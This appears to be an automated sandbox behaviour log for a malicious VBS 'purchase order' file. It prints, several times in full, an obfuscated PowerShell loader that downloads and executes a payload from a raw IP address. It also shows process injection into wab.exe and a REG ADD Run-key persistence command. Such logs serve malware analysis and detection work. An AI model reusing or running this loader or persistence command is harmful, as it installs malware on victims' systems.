              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20jmdb51.amd.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6228
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5552
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PO_La-Tanerie04180240124.vbsReversingLabs: Detection: 33%
              Source: PO_La-Tanerie04180240124.vbsVirustotal: Detection: 44%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
